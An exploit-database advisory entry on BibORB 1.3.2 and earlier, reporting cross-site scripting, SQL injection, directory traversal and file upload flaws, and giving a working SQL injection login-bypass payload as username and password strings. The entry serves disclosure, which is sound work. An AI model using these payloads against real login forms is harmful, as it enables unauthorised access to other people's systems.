BibORB 1.3.2 Login Module - Multiple SQL Injections

EDB-ID:

25121


Platform:

PHP

Published:

2005-02-17

source: http://www.securityfocus.com/bid/12583/info
   
   
BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks.
   
These vulnerabilities are reported to affect BibORB version 1.3.2 and all previous versions. 

When logging in, use the following username and password:

Username: x' or 1=1 or login='x
Password: x') or 1=1 or password=md5('x